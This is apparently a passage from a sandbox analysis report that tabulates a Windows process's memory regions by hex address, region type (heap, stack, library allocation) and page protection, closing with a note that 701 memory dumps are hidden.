|
stack
|
page read and write
|
||
|
4300000
|
heap
|
page read and write
|
||
|
AC0FEFD000
|
stack
|
page read and write
|
||
|
6DDA000
|
heap
|
page read and write
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
355C000
|
heap
|
page read and write
|
||
|
29BE000
|
heap
|
page read and write
|
||
|
2963B430000
|
trusted library allocation
|
page read and write
|
||
|
4880000
|
heap
|
page read and write
|
||
|
AC105FE000
|
unkown
|
page readonly
|
||
|
413E000
|
stack
|
page read and write
|
||
|
6DE3000
|
heap
|
page read and write
|
||
|
2963B400000
|
trusted library allocation
|
page read and write
|
||
|
2BC6000
|
heap
|
page read and write
|
||
|
682A000
|
heap
|
page read and write
|
||
|
71C1000
|
heap
|
page read and write
|
||
|
4EF4000
|
trusted library allocation
|
page read and write
|
||
|
4872000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
stack
|
page read and write
|
||
|
70D0000
|
trusted library allocation
|
page read and write
|
||
|
2C3B000
|
heap
|
page read and write
|
||
|
2963B550000
|
trusted library allocation
|
page read and write
|
||
|
2B63000
|
trusted library allocation
|
page execute and read and write
|
||
|
29637265000
|
heap
|
page read and write
|
||
|
3568000
|
heap
|
page read and write
|
||
|
2F2A000
|
stack
|
page read and write
|
||
|
296372D4000
|
heap
|
page read and write
|
||
|
3565000
|
heap
|
page read and write
|
||
|
5EDE000
|
stack
|
page read and write
|
||
|
7F3E000
|
stack
|
page read and write
|
||
|
296372FE000
|
heap
|
page read and write
|
||
|
4740000
|
heap
|
page read and write
|
||
|
3577000
|
heap
|
page read and write
|
||
|
29636E40000
|
trusted library section
|
page readonly
|
||
|
AC0FDFE000
|
unkown
|
page readonly
|
||
|
296372C0000
|
heap
|
page read and write
|
||
|
4BF5000
|
trusted library allocation
|
page read and write
|
||
|
67E7000
|
heap
|
page read and write
|
||
|
72D000
|
trusted library allocation
|
page execute and read and write
|
||
|
AC0FD7E000
|
stack
|
page read and write
|
||
|
3571000
|
heap
|
page read and write
|
||
|
29F9000
|
heap
|
page read and write
|
||
|
3588000
|
heap
|
page read and write
|
||
|
682A000
|
heap
|
page read and write
|
||
|
48DE000
|
stack
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
769000
|
heap
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
6DEA000
|
heap
|
page read and write
|
||
|
4090000
|
heap
|
page readonly
|
||
|
980000
|
heap
|
page read and write
|
||
|
5F5F000
|
stack
|
page read and write
|
||
|
6D14000
|
heap
|
page read and write
|
||
|
29636600000
|
heap
|
page read and write
|
||
|
6BAE000
|
stack
|
page read and write
|
||
|
6DE3000
|
heap
|
page read and write
|
||
|
3450000
|
trusted library allocation
|
page read and write
|
||
|
5AF9000
|
trusted library allocation
|
page read and write
|
||
|
29C4000
|
heap
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
2B70000
|
trusted library allocation
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
7BCE000
|
stack
|
page read and write
|
||
|
2B9E000
|
unkown
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
6DA2000
|
heap
|
page read and write
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
6A1F000
|
stack
|
page read and write
|
||
|
35B7000
|
heap
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
7F9000
|
heap
|
page read and write
|
||
|
34F1000
|
heap
|
page read and write
|
||
|
70B0000
|
trusted library allocation
|
page read and write
|
||
|
3568000
|
heap
|
page read and write
|
||
|
5AB000
|
stack
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
6D9A000
|
heap
|
page read and write
|
||
|
29635DE1000
|
trusted library allocation
|
page read and write
|
||
|
29635D60000
|
trusted library section
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
700E000
|
stack
|
page read and write
|
||
|
4080000
|
trusted library allocation
|
page read and write
|
||
|
680B000
|
heap
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
2B1B000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
29637400000
|
trusted library allocation
|
page read and write
|
||
|
2B85000
|
heap
|
page read and write
|
||
|
29635EEF000
|
heap
|
page read and write
|
||
|
351A000
|
heap
|
page read and write
|
||
|
4585000
|
trusted library allocation
|
page read and write
|
||
|
AC0F0FC000
|
stack
|
page read and write
|
||
|
4B36000
|
trusted library allocation
|
page read and write
|
||
|
29637305000
|
heap
|
page read and write
|
||
|
29636E00000
|
trusted library section
|
page readonly
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
682F000
|
heap
|
page read and write
|
||
|
78F000
|
heap
|
page read and write
|
||
|
4304000
|
heap
|
page read and write
|
||
|
35B7000
|
heap
|
page read and write
|
||
|
6832000
|
heap
|
page read and write
|
||
|
29635EC5000
|
heap
|
page read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
67E9000
|
heap
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
4BD3000
|
trusted library allocation
|
page read and write
|
||
|
7EFE000
|
stack
|
page read and write
|
||
|
AC102FE000
|
unkown
|
page readonly
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
357C000
|
heap
|
page read and write
|
||
|
29BE000
|
heap
|
page read and write
|
||
|
49DD000
|
stack
|
page read and write
|
||
|
5E7E000
|
stack
|
page read and write
|
||
|
70DE000
|
stack
|
page read and write
|
||
|
6B2E000
|
stack
|
page read and write
|
||
|
4B22000
|
trusted library allocation
|
page read and write
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
7430000
|
trusted library allocation
|
page read and write
|
||
|
6835000
|
heap
|
page read and write
|
||
|
5360000
|
heap
|
page read and write
|
||
|
358E000
|
heap
|
page read and write
|
||
|
34F1000
|
heap
|
page read and write
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
67D0000
|
heap
|
page read and write
|
||
|
3586000
|
heap
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
2963B530000
|
trusted library allocation
|
page read and write
|
||
|
AC0F2F9000
|
stack
|
page read and write
|
||
|
6C3D000
|
stack
|
page read and write
|
||
|
9A9000
|
heap
|
page read and write
|
||
|
72E0000
|
heap
|
page read and write
|
||
|
B170000
|
trusted library allocation
|
page read and write
|
||
|
2963B473000
|
trusted library allocation
|
page read and write
|
||
|
730000
|
trusted library allocation
|
page read and write
|
||
|
2B50000
|
trusted library allocation
|
page read and write
|
||
|
3460000
|
trusted library allocation
|
page read and write
|
||
|
2963B5A0000
|
remote allocation
|
page read and write
|
||
|
5366000
|
heap
|
page read and write
|
||
|
29635E9D000
|
heap
|
page read and write
|
||
|
67ED000
|
heap
|
page read and write
|
||
|
6FFC000
|
stack
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
3554000
|
heap
|
page read and write
|
||
|
41DE000
|
trusted library allocation
|
page read and write
|
||
|
29636B40000
|
trusted library allocation
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
2B6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6815000
|
heap
|
page read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
720000
|
trusted library allocation
|
page read and write
|
||
|
29BB000
|
heap
|
page read and write
|
||
|
55C0000
|
heap
|
page read and write
|
||
|
29635E00000
|
heap
|
page read and write
|
||
|
67F8000
|
heap
|
page read and write
|
||
|
4420000
|
heap
|
page read and write
|
||
|
AC0ECF7000
|
stack
|
page read and write
|
||
|
68E000
|
stack
|
page read and write
|
||
|
72CE000
|
stack
|
page read and write
|
||
|
60F000
|
stack
|
page read and write
|
||
|
3519000
|
heap
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
682D000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
354C000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
AC0FC7E000
|
stack
|
page read and write
|
||
|
6A8E000
|
stack
|
page read and write
|
||
|
2963B5A0000
|
remote allocation
|
page read and write
|
||
|
4BCE000
|
trusted library allocation
|
page read and write
|
||
|
29635E13000
|
heap
|
page read and write
|
||
|
6F1B000
|
stack
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
354C000
|
heap
|
page read and write
|
||
|
AC0F1FE000
|
unkown
|
page readonly
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
6835000
|
heap
|
page read and write
|
||
|
6DA0000
|
heap
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
29635F13000
|
heap
|
page read and write
|
||
|
67FB000
|
heap
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
7F7E000
|
stack
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
AC0F87E000
|
stack
|
page read and write
|
||
|
682F000
|
heap
|
page read and write
|
||
|
2B64000
|
trusted library allocation
|
page read and write
|
||
|
2963B4D0000
|
trusted library allocation
|
page read and write
|
||
|
7BE0000
|
heap
|
page read and write
|
||
|
40A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5624000
|
heap
|
page read and write
|
||
|
68D000
|
stack
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
682B000
|
heap
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
67ED000
|
heap
|
page read and write
|
||
|
6D10000
|
heap
|
page read and write
|
||
|
49F0000
|
heap
|
page execute and read and write
|
||
|
3515000
|
heap
|
page read and write
|
||
|
6ED9000
|
trusted library allocation
|
page read and write
|
||
|
6B6E000
|
stack
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
2C44000
|
heap
|
page read and write
|
||
|
35B7000
|
heap
|
page read and write
|
||
|
4DD0000
|
trusted library allocation
|
page read and write
|
||
|
97E000
|
unkown
|
page read and write
|
||
|
6ACE000
|
stack
|
page read and write
|
||
|
3574000
|
heap
|
page read and write
|
||
|
43EF000
|
trusted library allocation
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
6815000
|
heap
|
page read and write
|
||
|
29635E2B000
|
heap
|
page read and write
|
||
|
AC0F7FE000
|
unkown
|
page readonly
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
34DE000
|
heap
|
page read and write
|
||
|
29635F29000
|
heap
|
page read and write
|
||
|
2963B444000
|
trusted library allocation
|
page read and write
|
||
|
357B000
|
heap
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
3594000
|
heap
|
page read and write
|
||
|
2963671A000
|
heap
|
page read and write
|
||
|
6DE3000
|
heap
|
page read and write
|
||
|
4280000
|
heap
|
page read and write
|
||
|
34A0000
|
heap
|
page read and write
|
||
|
67ED000
|
heap
|
page read and write
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
5FDF000
|
stack
|
page read and write
|
||
|
6832000
|
heap
|
page read and write
|
||
|
3501000
|
heap
|
page read and write
|
||
|
67D4000
|
heap
|
page read and write
|
||
|
4870000
|
trusted library allocation
|
page read and write
|
||
|
35B7000
|
heap
|
page read and write
|
||
|
682F000
|
stack
|
page read and write
|
||
|
294B000
|
heap
|
page read and write
|
||
|
3574000
|
heap
|
page read and write
|
||
|
660E000
|
stack
|
page read and write
|
||
|
88A0000
|
heap
|
page read and write
|
||
|
692B000
|
stack
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
296365D0000
|
trusted library allocation
|
page read and write
|
||
|
29636E50000
|
trusted library section
|
page readonly
|
||
|
354A000
|
heap
|
page read and write
|
||
|
2638000
|
stack
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
2963B401000
|
trusted library allocation
|
page read and write
|
||
|
67EE000
|
heap
|
page read and write
|
||
|
67ED000
|
heap
|
page read and write
|
||
|
67D1000
|
heap
|
page read and write
|
||
|
7270000
|
trusted library allocation
|
page read and write
|
||
|
42CD000
|
stack
|
page read and write
|
||
|
35B7000
|
heap
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
1DC000
|
stack
|
page read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
658E000
|
stack
|
page read and write
|
||
|
29635EA1000
|
heap
|
page read and write
|
||
|
4877000
|
trusted library allocation
|
page execute and read and write
|
||
|
29636615000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
296372DC000
|
heap
|
page read and write
|
||
|
2963B4D0000
|
trusted library allocation
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
73B0000
|
trusted library allocation
|
page read and write
|
||
|
736E000
|
stack
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
6EFC000
|
stack
|
page read and write
|
||
|
7182000
|
heap
|
page read and write
|
||
|
61FE000
|
stack
|
page read and write
|
||
|
29636702000
|
heap
|
page read and write
|
||
|
5B57000
|
trusted library allocation
|
page read and write
|
||
|
29635C40000
|
heap
|
page read and write
|
||
|
AC0FAFE000
|
unkown
|
page readonly
|
||
|
7250000
|
heap
|
page execute and read and write
|
||
|
5F1E000
|
stack
|
page read and write
|
||
|
3870000
|
heap
|
page read and write
|
||
|
6F8000
|
heap
|
page read and write
|
||
|
AC100FE000
|
unkown
|
page readonly
|
||
|
2963730A000
|
heap
|
page read and write
|
||
|
6D88000
|
heap
|
page read and write
|
||
|
2963B420000
|
trusted library allocation
|
page read and write
|
||
|
7C35000
|
trusted library allocation
|
page read and write
|
||
|
356C000
|
heap
|
page read and write
|
||
|
32F9000
|
stack
|
page read and write
|
||
|
4950000
|
heap
|
page read and write
|
||
|
29637258000
|
heap
|
page read and write
|
||
|
6D3D000
|
stack
|
page read and write
|
||
|
4BBD000
|
trusted library allocation
|
page read and write
|
||
|
67E7000
|
heap
|
page read and write
|
||
|
6F20000
|
trusted library allocation
|
page read and write
|
||
|
350F000
|
heap
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
296372FA000
|
heap
|
page read and write
|
||
|
29635F02000
|
heap
|
page read and write
|
||
|
6C0E000
|
stack
|
page read and write
|
||
|
6835000
|
heap
|
page read and write
|
||
|
3850000
|
heap
|
page read and write
|
||
|
4B53000
|
trusted library allocation
|
page read and write
|
||
|
6D28000
|
heap
|
page read and write
|
||
|
358C000
|
heap
|
page read and write
|
||
|
4589000
|
trusted library allocation
|
page read and write
|
||
|
67D8000
|
heap
|
page read and write
|
||
|
70E0000
|
trusted library allocation
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
71ED000
|
heap
|
page read and write
|
||
|
67D2000
|
heap
|
page read and write
|
||
|
29F9000
|
heap
|
page read and write
|
||
|
793000
|
heap
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page execute and read and write
|
||
|
6A7000
|
heap
|
page read and write
|
||
|
AC0FA7E000
|
stack
|
page read and write
|
||
|
7030000
|
trusted library allocation
|
page read and write
|
||
|
6D2F000
|
heap
|
page read and write
|
||
|
7164000
|
heap
|
page read and write
|
||
|
4AE0000
|
heap
|
page execute and read and write
|
||
|
7AF0000
|
heap
|
page read and write
|
||
|
7282000
|
trusted library allocation
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
2963B550000
|
trusted library allocation
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
AC0F5FE000
|
unkown
|
page readonly
|
||
|
29636D20000
|
trusted library allocation
|
page read and write
|
||
|
29635D50000
|
trusted library allocation
|
page read and write
|
||
|
AC10DFE000
|
unkown
|
page readonly
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
4160000
|
trusted library allocation
|
page read and write
|
||
|
7BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3594000
|
heap
|
page read and write
|
||
|
5A9F000
|
stack
|
page read and write
|
||
|
6ED0000
|
trusted library allocation
|
page read and write
|
||
|
5D7E000
|
stack
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
40B0000
|
heap
|
page read and write
|
||
|
29EF000
|
heap
|
page read and write
|
||
|
4875000
|
trusted library allocation
|
page execute and read and write
|
||
|
7480000
|
trusted library allocation
|
page execute and read and write
|
||
|
29636713000
|
heap
|
page read and write
|
||
|
6C80000
|
heap
|
page read and write
|
||
|
6D36000
|
heap
|
page read and write
|
||
|
350A000
|
heap
|
page read and write
|
||
|
2946000
|
heap
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
71E5000
|
heap
|
page read and write
|
||
|
67D6000
|
heap
|
page read and write
|
||
|
2963B470000
|
trusted library allocation
|
page read and write
|
||
|
29636700000
|
heap
|
page read and write
|
||
|
AC101FE000
|
stack
|
page read and write
|
||
|
29637300000
|
heap
|
page read and write
|
||
|
AC1037E000
|
stack
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
599E000
|
stack
|
page read and write
|
||
|
711F000
|
stack
|
page read and write
|
||
|
6DDE000
|
heap
|
page read and write
|
||
|
67EA000
|
heap
|
page read and write
|
||
|
819C000
|
stack
|
page read and write
|
||
|
724000
|
trusted library allocation
|
page read and write
|
||
|
682F000
|
heap
|
page read and write
|
||
|
5C2B000
|
stack
|
page read and write
|
||
|
4890000
|
trusted library allocation
|
page read and write
|
||
|
29C5000
|
heap
|
page read and write
|
||
|
AC1007E000
|
stack
|
page read and write
|
||
|
6D99000
|
heap
|
page read and write
|
||
|
67AB000
|
stack
|
page read and write
|
||
|
29635E8A000
|
heap
|
page read and write
|
||
|
7050000
|
trusted library allocation
|
page read and write
|
||
|
34F1000
|
heap
|
page read and write
|
||
|
67ED000
|
heap
|
page read and write
|
||
|
710000
|
trusted library allocation
|
page read and write
|
||
|
6835000
|
heap
|
page read and write
|
||
|
34FE000
|
heap
|
page read and write
|
||
|
5364000
|
heap
|
page read and write
|
||
|
7F530000
|
trusted library allocation
|
page execute and read and write
|
||
|
4DE5000
|
trusted library allocation
|
page read and write
|
||
|
536F000
|
heap
|
page read and write
|
||
|
2963C000000
|
heap
|
page read and write
|
||
|
6D05000
|
heap
|
page read and write
|
||
|
29636801000
|
trusted library allocation
|
page read and write
|
||
|
7150000
|
heap
|
page read and write
|
||
|
34DE000
|
heap
|
page read and write
|
||
|
353A000
|
heap
|
page read and write
|
||
|
2963730D000
|
heap
|
page read and write
|
||
|
664E000
|
stack
|
page read and write
|
||
|
4AF1000
|
trusted library allocation
|
page read and write
|
||
|
6C7B000
|
stack
|
page read and write
|
||
|
351B000
|
heap
|
page read and write
|
||
|
7170000
|
heap
|
page read and write
|
||
|
67F6000
|
heap
|
page read and write
|
||
|
296371F0000
|
trusted library allocation
|
page read and write
|
||
|
683A000
|
heap
|
page read and write
|
||
|
5E80000
|
heap
|
page read and write
|
||
|
682A000
|
heap
|
page read and write
|
||
|
29635EA6000
|
heap
|
page read and write
|
||
|
296372F6000
|
heap
|
page read and write
|
||
|
6D88000
|
heap
|
page read and write
|
||
|
2805000
|
heap
|
page read and write
|
||
|
6CC2000
|
heap
|
page read and write
|
||
|
42D8000
|
trusted library allocation
|
page read and write
|
||
|
70A0000
|
trusted library allocation
|
page read and write
|
There are 701 hidden memdumps, click here to show them.